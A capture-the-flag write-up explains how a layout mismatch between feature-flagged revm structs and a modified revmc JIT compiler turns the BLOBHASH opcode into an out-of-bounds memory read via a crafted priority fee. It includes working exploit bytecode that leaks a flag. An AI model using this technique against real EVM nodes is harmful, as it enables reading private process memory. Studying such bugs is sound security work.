I Love REVMC

Author: cbd1913 (X/Twitter)

Background

In this challenge, we are given modified versions of anvil and revm that add a JIT compiler feature, powered by the revmc crate. The main modifications are listed below.

foundry and anvil

  • Dependencies for revm are updated to a local path, and revmc is added. Additionally, the optional_balance_check and optional_disable_eip3074 features are enabled for revm in anvil.

  • A new JSON-RPC method, blaz_jitCompile, is added to compile a contract's bytecode into a shared library. It writes the hex-encoded bytecode to /tmp/code.hex and then runs the jit-compiler binary (/opt/jit-compiler unless JIT_COMPILER_PATH is set) to compile it into a library.

    // some code is omitted for brevity
    let code = self.get_code(addr, None).await?;
    let mut prev_jit_addr = self.jit_addr.write().await;
    std::fs::write("/tmp/code.hex", hex::encode(code)).map_err(|e| {
        BlockchainError::Internal(format!("Failed to write code to /tmp/code.hex: {e}"))
    })?;
    
    let jit_compiler_path =
        std::env::var("JIT_COMPILER_PATH").unwrap_or_else(|_| "/opt/jit-compiler".to_string());
    let output = std::process::Command::new(jit_compiler_path)
        .output()
        .map_err(|e| BlockchainError::Internal(format!("Failed to run jit-compile: {e}")))?;

  • After that, jit_addr is set in the anvil backend, and new_evm_with_jit is used to process new transactions in executor.rs.

  • The new transaction-processing path uses JitHelper::get_function to override the existing get_function in inspector.rs.

  • JitHelper dynamically loads libjit.so, calls jit_init with an array of revmc builtin function pointers to initialize it, and then returns the real_jit_fn symbol as an EvmCompilerFn. This is the function that gets invoked when a transaction is executed.

    // some code is omitted for brevity
    // open libjit.so
    let libjit = libc::dlopen(b"libjit.so\0".as_ptr() as *const libc::c_char, libc::RTLD_LAZY);
    let jit_init = libc::dlsym(libjit, b"jit_init\0".as_ptr() as *const libc::c_char);
    let mut funcs: [*mut libc::c_void; 40] = [
      revmc_builtins::__revmc_builtin_panic as _,
      // more functions ...
    ];
    let jit_init: extern "C" fn(*mut *mut libc::c_void) = std::mem::transmute(jit_init);
    jit_init(funcs.as_mut_ptr());
    
    let func = libc::dlsym(libjit, b"real_jit_fn\0".as_ptr() as *const libc::c_char);
    let func: RawEvmCompilerFn = std::mem::transmute(func);
    return Some(EvmCompilerFn::from(func));

revm and revmc

  • A field disable_authorization is added to TxEnv when the optional_disable_eip3074 feature is enabled, and disable_balance_check is moved up in CfgEnv.
  • In translate_inst inside revmc, which is the core logic that translates bytecode into IR (intermediate representation), the handling of the op::BLOBHASH instruction is changed to call build_blobhash.
  • build_blobhash contains fairly involved logic that emits IR to read a blob hash: it computes the memory offset of the blob_hashes length in TxEnv, checks the index against it, computes the element pointer of the requested blob hash, then loads and returns it.

JIT Compiler

  • linker.c declares many function pointers, such as __revmc_builtin_gas_price_ptr and __revmc_builtin_balance_ptr, which are initialized to 0 and filled in by jit_init().
  • In load_flag(), it reads the flag and stores it at memory address 0x13370000.
  • According to anvil-image/build.sh, linker.c will be compiled into libjit_dummy.o.
  • The JIT compiler's main logic (main.rs) reads /tmp/code.hex and uses EvmCompiler from revmc to compile it into /tmp/libjit_main.o, which implements real_jit_fn.
  • Then it's combined with /tmp/libjit_dummy.o to produce the final shared library /lib/libjit.so.
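To make the pointer-table idea concrete, here is a minimal Rust model of what linker.c and jit_init are described as doing. It is only a sketch under assumptions: the real linker.c is C and declares separately named globals (such as __revmc_builtin_gas_price_ptr), whereas this model collapses them into one hypothetical array, BUILTIN_SLOTS, and assumes jit_init simply copies the host's array entries into the slots in order.

```rust
use std::ffi::c_void;
use std::sync::atomic::{AtomicPtr, Ordering};

// Illustrative slot count; the funcs array built in JitHelper has 40 entries.
pub const NUM_BUILTINS: usize = 40;

// A null slot, mirroring how each `__revmc_builtin_*_ptr` global in linker.c starts at 0.
const NULL_SLOT: AtomicPtr<c_void> = AtomicPtr::new(std::ptr::null_mut());

// Hypothetical table standing in for the individually named globals in linker.c.
pub static BUILTIN_SLOTS: [AtomicPtr<c_void>; NUM_BUILTINS] = [NULL_SLOT; NUM_BUILTINS];

/// Hypothetical model of `jit_init`: copy each pointer from the host's array
/// into the matching slot, in order.
///
/// # Safety
/// `funcs` must point to at least `NUM_BUILTINS` readable pointers.
pub unsafe extern "C" fn jit_init(funcs: *mut *mut c_void) {
    for (i, slot) in BUILTIN_SLOTS.iter().enumerate() {
        let f = unsafe { *funcs.add(i) };
        slot.store(f, Ordering::SeqCst);
    }
}
```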

Analysis

We can understand the whole flow now:

  1. Deploy a smart contract.
  2. Call blaz_jitCompile to compile it. It executes the pre-compiled jit-compiler binary which does the following:
    • Reads the smart contract's bytecode and uses revmc to translate each EVM opcode into IR code.
    • The IR code is compiled into real_jit_fn of the shared library /lib/libjit.so.
  3. Submit a transaction whose to address is the malicious contract.
  4. real_jit_fn is called with arguments describing the current transaction. This is where the program logic compiled by jit-compiler runs.
    • During the execution of real_jit_fn, it can call some revmc built-in functions to interact with Rust code.
  5. We need to find a way to let real_jit_fn read the flag from memory 0x13370000.

Because real_jit_fn is compiled from IR code generated by revmc, we need to find a bug in revmc that generates incorrect IR and causes an out-of-bounds memory read. The only modified part of revmc is the BLOBHASH opcode, so that is where we should look.

fn build_blobhash(&mut self) {
    let index = self.bcx.fn_param(0);
    let env = self.bcx.fn_param(1);
    let isize_type = self.isize_type;
    let word_type = self.word_type;

    let tx_env_offset = mem::offset_of!(Env, tx);
    let blobhash_offset = mem::offset_of!(TxEnv, blob_hashes);
    let blobhash_len_offset = mem::offset_of!(pf::Vec<revm_primitives::B256>, len);
    let blobhash_ptr_offset = mem::offset_of!(pf::Vec<revm_primitives::B256>, ptr);

    let blobhash_len_ptr = self.get_field(
        env,
        tx_env_offset + blobhash_offset + blobhash_len_offset,
        "env.tx.blobhashes.len.addr",
    );
    let blobhash_ptr_ptr = self.get_field(
        env,
        tx_env_offset + blobhash_offset + blobhash_ptr_offset,
        "env.tx.blobhashes.ptr.addr",
    );

    let blobhash_len = self.bcx.load(isize_type, blobhash_len_ptr, "env.tx.blobhashes.len");
    // convert to u256
    let blobhash_len = self.bcx.zext(word_type, blobhash_len);

    // check for out of bounds
    let in_bounds = self.bcx.icmp(IntCC::UnsignedLessThan, index, blobhash_len);
    let zero = self.bcx.iconst_256(U256::ZERO);

    // if out of bounds, return 0
    let r = self.bcx.lazy_select(
        in_bounds,
        word_type,
        |bcx| {
            let index = bcx.ireduce(isize_type, index);
            let blobhash_ptr =
                bcx.load(self.ptr_type, blobhash_ptr_ptr, "env.tx.blobhashes.ptr");

            let address = bcx.gep(word_type, blobhash_ptr, &[index], "blobhash.addr");
            let tmp = bcx.new_stack_slot(word_type, "blobhash.addr");
            tmp.store(bcx, zero);
            let tmp_addr = tmp.addr(bcx);
            let tmp_word_size = bcx.iconst(isize_type, 32);
            bcx.memcpy(tmp_addr, address, tmp_word_size);

            let mut value = tmp.load(bcx, "blobhash.i256");
            if cfg!(target_endian = "little") {
                value = bcx.bswap(value);
            }
            value
        },
        |_bcx| zero,
    );

    self.bcx.ret(&[r]);
}

The main logic is:

  1. Determine the memory offset of the blob_hashes length within Env: take the offset of the tx field (a TxEnv) in Env, add the offset of blob_hashes in TxEnv, and finally add the offset of the len field in the Vec.
  2. Use the same approach to get the address of the Vec's ptr field, which holds the pointer to the first item of blob_hashes.
  3. Read the length of blob_hashes from blobhash_len_ptr and build a condition that checks whether index is out of bounds.
  4. If it is out of bounds, return 0. Otherwise, read the blob_hashes item at index and return it.
  5. The memory address of blob_hashes[i] is calculated as blobhash_ptr + 32 * index.

The interesting part is that this code builds another program that runs at transaction time. When building the IR for BLOBHASH, it doesn't know the actual Env or index, so it emits symbolic logic to handle them. The field offsets, however, are not symbolic: they come from mem::offset_of!, are evaluated when the jit-compiler binary itself is built, and are embedded in the IR as constants. Therefore, if the struct layout at runtime differs from the one the jit-compiler was built with, the computed addresses will be wrong and lead to an out-of-bounds memory read.
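The runtime behaviour of the emitted IR can be modelled in plain Rust. In this sketch, a byte slice stands in for process memory (addresses are indices into it), and len_off and ptr_off play the role of the constants that mem::offset_of! produced when the jit-compiler was built. It assumes a 64-bit little-endian host and reduces the 256-bit index to a u64 for simplicity; blobhash_model is a hypothetical name, not part of revmc.

```rust
/// Hypothetical model of the code emitted by build_blobhash.
/// `mem` stands in for process memory, `env` is the address of the Env struct,
/// and `len_off` / `ptr_off` are the offsets of blob_hashes.len and
/// blob_hashes.ptr that were baked into the IR at build time.
pub fn blobhash_model(mem: &[u8], env: usize, len_off: usize, ptr_off: usize, index: u64) -> [u8; 32] {
    // Load a pointer-sized (8-byte, little-endian) value from `addr`.
    let load_usize = |addr: usize| -> u64 {
        let mut buf = [0u8; 8];
        buf.copy_from_slice(&mem[addr..addr + 8]);
        u64::from_le_bytes(buf)
    };

    // Load env.tx.blob_hashes.len and bounds-check the index.
    let len = load_usize(env + len_off);
    if index >= len {
        return [0u8; 32]; // out of bounds: BLOBHASH pushes 0
    }

    // Load env.tx.blob_hashes.ptr and copy the 32 bytes at ptr + 32 * index.
    let addr = load_usize(env + ptr_off).wrapping_add(index.wrapping_mul(32)) as usize;
    let mut word = [0u8; 32];
    word.copy_from_slice(&mem[addr..addr + 32]);
    // The real IR loads these bytes as an i256 and byte-swaps them on
    // little-endian hosts, which amounts to treating them as a big-endian word,
    // so returning the raw bytes in memory order is equivalent.
    word
}
```

Passing offsets that are too small, as happens in this challenge, makes the same logic read its length and pointer from whatever precedes the real blob_hashes field.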

The Bug (Spoiler)

The calculation of the blob_hashes[i] memory address is incorrect. The bytecode is compiled by the pre-built jit-compiler binary, which depends on the revm and revmc crates without any extra feature flags. At runtime, however, anvil has enabled several revm features, such as optional_disable_eip3074 and optional_balance_check, which shift the memory layout of CfgEnv and TxEnv.

struct CfgEnv {
    // ...
    /// Skip balance checks if true. Adds transaction cost to balance to ensure execution doesn't fail.
    #[cfg(feature = "optional_balance_check")]
    pub disable_balance_check: bool,
    // ...
    #[cfg(feature = "optional_eip3607")]
    pub disable_eip3607: bool,
    // ...
}

struct TxEnv {
    // ...
    /// Disable authorization
    #[cfg(feature = "optional_disable_eip3074")]
    pub disable_authorization: bool,
    // ...
}
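To see how a feature-gated field moves the offsets that were baked in at build time, here is a minimal sketch with two simplified stand-ins for TxEnv. The structs and their field set are hypothetical, and #[repr(C)] is used only to make the layout predictable on a 64-bit target; the real revm structs use the default Rust layout, where the compiler may reorder fields, so the real shift has to be measured rather than derived by hand.

```rust
use std::mem::offset_of;

// Hypothetical, simplified TxEnv as seen by the jit-compiler (feature off).
#[repr(C)]
pub struct TxEnvWithoutFeature {
    pub gas_limit: u64,
    pub gas_priority_fee: [u64; 4],
    pub blob_hashes: Vec<[u8; 32]>,
}

// The same struct as seen by anvil at runtime (feature on).
#[repr(C)]
pub struct TxEnvWithFeature {
    pub disable_authorization: bool,
    pub gas_limit: u64,
    pub gas_priority_fee: [u64; 4],
    pub blob_hashes: Vec<[u8; 32]>,
}

/// How many bytes later `blob_hashes` sits once the feature field is present.
pub fn blob_hashes_shift() -> usize {
    offset_of!(TxEnvWithFeature, blob_hashes) - offset_of!(TxEnvWithoutFeature, blob_hashes)
}
```

Even a one-byte bool moves blob_hashes by 8 bytes here, because the following u64 field must stay 8-byte aligned.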

At runtime, CfgEnv and TxEnv are larger than they were when the IR was built, so the blob_hashes field in TxEnv ends up at a different address. By printing the structs and their sizes, we found that the actual shift is 48 bytes: at runtime, blob_hashes sits 48 bytes after the offset the JIT compiler assumes. As a result, the addresses the JIT code computes for the blob_hashes length and pointer fall inside the preceding field in TxEnv, gas_priority_fee.

+---------------------------------+--------------------+--------------------+-----------------+
| gas_priority_fee (40 bytes)     | capacity (8 bytes) |  pointer (8 bytes) | length (8 bytes)|
+---------------------------------+--------------------+--------------------+-----------------+

After the shift, when the JIT code reads the blob_hashes length, it actually reads the 9th to 16th bytes of gas_priority_fee, and when it reads the blob_hashes element pointer, it reads the 1st to 8th bytes. Since gas_priority_fee is the max priority fee chosen by whoever sends the transaction, we control both values, so we can bypass the length check and make it read the flag!

Exploit

To read memory at 0x13370000, we can use index = 0 and make blobhash_ptr read as 0x13370000. The length check also needs blobhash_len > 0, so bytes 9 to 16 of gas_priority_fee must encode a non-zero value, which requires gas_priority_fee to be at least 2**64. Setting it to 2**64 + 0x13370000 gives blobhash_ptr = 0x13370000 and blobhash_len = 1, which passes the check. The BLOBHASH opcode then returns the 32 bytes at 0x13370000 onto the EVM stack, and what remains is to leak that stack element.
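The byte arithmetic can be checked with a few lines of Rust. This sketch follows the mapping described above (bytes 1 to 8 read as the pointer, bytes 9 to 16 as the length) and assumes the 256-bit fee is stored little-endian, as ruint's U256 keeps its 64-bit limbs least-significant first on x86-64; only the low 128 bits matter, so a u128 suffices. misread_fields is a hypothetical helper name.

```rust
/// Hypothetical helper: split a priority fee into the two 8-byte
/// little-endian words that the misaligned JIT code reads.
/// Bytes 1-8 become `blobhash_ptr`, bytes 9-16 become `blobhash_len`.
pub fn misread_fields(priority_fee: u128) -> (u64, u64) {
    let bytes = priority_fee.to_le_bytes();
    let mut ptr = [0u8; 8];
    let mut len = [0u8; 8];
    ptr.copy_from_slice(&bytes[0..8]);
    len.copy_from_slice(&bytes[8..16]);
    (u64::from_le_bytes(ptr), u64::from_le_bytes(len))
}
```

With a fee below 2**64 the misread length is 0, index 0 fails the bounds check, and BLOBHASH simply returns 0.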

My Solution

The bytecode I used is 5f496004351c60011660145760015f5260205ff35b5f5ffd:

[00] PUSH0 
[01] BLOBHASH 
[02] PUSH1          04
[04] CALLDATALOAD 
[05] SHR 
[06] PUSH1          01
[08] AND 
[09] PUSH1          14
[0b] JUMPI 
[0c] PUSH1          01
[0e] PUSH0 
[0f] MSTORE 
[10] PUSH1          20
[12] PUSH0 
[13] RETURN 
[14] JUMPDEST 
[15] PUSH0 
[16] PUSH0 
[17] REVERT
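The listing can be reproduced from the hex string with a tiny disassembler. This sketch is not a general EVM disassembler: it only names the opcodes that appear in this write-up (plus PUSH1 to PUSH32) and prints anything else as a raw hex byte. It expects an even-length hex string without a 0x prefix.

```rust
/// Minimal disassembler for the opcodes used in this write-up.
pub fn disassemble(hex: &str) -> Vec<String> {
    // Decode the hex string two characters at a time.
    let code: Vec<u8> = (0..hex.len())
        .step_by(2)
        .map(|i| u8::from_str_radix(&hex[i..i + 2], 16).expect("invalid hex"))
        .collect();

    let mut out = Vec::new();
    let mut pc = 0;
    while pc < code.len() {
        let op = code[pc];
        if (0x60..=0x7f).contains(&op) {
            // PUSHn is followed by n immediate bytes (truncated at end of code).
            let n = (op - 0x5f) as usize;
            let end = (pc + 1 + n).min(code.len());
            let imm: String = code[pc + 1..end].iter().map(|b| format!("{b:02x}")).collect();
            out.push(format!("[{pc:02x}] PUSH{n} {imm}"));
            pc += 1 + n;
            continue;
        }
        let name = match op {
            0x00 => "STOP",
            0x16 => "AND",
            0x1c => "SHR",
            0x35 => "CALLDATALOAD",
            0x39 => "CODECOPY",
            0x49 => "BLOBHASH",
            0x52 => "MSTORE",
            0x57 => "JUMPI",
            0x5b => "JUMPDEST",
            0x5f => "PUSH0",
            0xa0 => "LOG0",
            0xf3 => "RETURN",
            0xfd => "REVERT",
            _ => "",
        };
        if name.is_empty() {
            out.push(format!("[{pc:02x}] 0x{op:02x}"));
        } else {
            out.push(format!("[{pc:02x}] {name}"));
        }
        pc += 1;
    }
    out
}
```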

It calls BLOBHASH with index = 0, shifts the result right by the 32-byte calldata argument i (read at offset 4, right after the selector), and keeps the lowest bit, leaking one bit of the stack element per transaction. The transaction reverts if bit i of the stack element is 1 and returns normally otherwise. When sending each transaction, we set the max priority fee to 2**64 + 0x13370000 to meet the conditions above. After sending 256 transactions, we can recover the full flag.
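Both sides of this bit-by-bit leak can be sketched as follows: building the calldata that probes bit i, and reassembling the word once every result is known. The 4-byte selector is left as zeros on the assumption that nothing reads it (true for the bytecode above, which only loads calldata at offset 4). The function names are hypothetical, and sending the transactions themselves is not shown.

```rust
/// Hypothetical helper: calldata probing bit `bit`, i.e. a 4-byte selector
/// (left as zeros) followed by `bit` as a 32-byte big-endian word,
/// which the contract's CALLDATALOAD reads at offset 4.
pub fn probe_calldata(bit: u8) -> Vec<u8> {
    let mut data = vec![0u8; 4 + 32];
    data[35] = bit; // any shift below 256 fits in the last byte of the word
    data
}

/// Hypothetical helper: rebuild the 32-byte word from 256 probes, where
/// `reverted[i]` is true when the transaction probing bit `i` reverted,
/// i.e. bit `i` of the word is 1. Bit 0 is the least significant bit,
/// which lives in the last byte of the big-endian word.
pub fn recover_word(reverted: &[bool; 256]) -> [u8; 32] {
    let mut word = [0u8; 32];
    for (i, &bit_set) in reverted.iter().enumerate() {
        if bit_set {
            word[31 - i / 8] |= 1u8 << (i % 8);
        }
    }
    word
}
```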

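After checking the official solution, I found that it simply uses LOG0 to log the stack element, which is more efficient! Its first 10 bytes are deployment code: CODECOPY copies the runtime code starting at offset 0x0a into memory and RETURN returns it as the contract code (it copies 8 bytes but returns 9; the last byte is 0x00, STOP, which zero-initialized memory supplies). The runtime code stores the BLOBHASH result in memory and emits it with LOG0.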

6008600a5f3960095ff35f495f5260205fa000

[00] PUSH1      08
[02] PUSH1      0a
[04] PUSH0 
[05] CODECOPY 
[06] PUSH1      09
[08] PUSH0 
[09] RETURN 
[0a] PUSH0 
[0b] BLOBHASH 
[0c] PUSH0 
[0d] MSTORE 
[0e] PUSH1      20
[10] PUSH0 
[11] LOG0 
[12] STOP
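Once the LOG0 entry is retrieved, its 32-byte data field is the flag word. Because the JIT code byte-swaps the loaded value on little-endian hosts and MSTORE writes words big-endian, the log bytes should appear in the same order as they sit in memory at 0x13370000. This sketch assumes the flag is ASCII, at most 32 bytes, and padded with trailing zero bytes; decode_flag is a hypothetical helper.

```rust
/// Hypothetical helper: decode the 32-byte LOG0 data into text,
/// dropping trailing zero padding.
pub fn decode_flag(log_data: &[u8; 32]) -> String {
    // Index just past the last non-zero byte (0 if every byte is zero).
    let end = log_data.iter().rposition(|&b| b != 0).map_or(0, |p| p + 1);
    String::from_utf8_lossy(&log_data[..end]).into_owned()
}
```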